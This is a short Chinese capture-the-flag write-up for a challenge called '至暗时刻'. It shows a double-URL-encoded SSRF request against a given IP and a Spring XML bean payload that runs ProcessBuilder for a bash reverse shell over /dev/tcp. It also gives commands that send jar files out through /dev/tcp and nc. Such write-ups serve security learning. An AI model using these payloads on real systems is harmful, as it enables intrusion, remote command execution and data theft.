第一题 至暗时刻
需要ssrf127.0.0.1的8088端口 有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://ip/payload.xml
ssrf成功后发现需要xml
发现可以用FileSystemXmlApplicationContext 命令执行
https://www.cnblogs.com/afanti/p/10815728.html
使用这里的payload拿shell
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg >
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash >& /dev/tcp/ip/2333 0>&1]]
拿到shell以后 把home下的jar下载回来
cat /home/*.jar > /dev/tcp/ip/port
nc -lvnp port >1.jar
用jd-gui 反编译拿到flag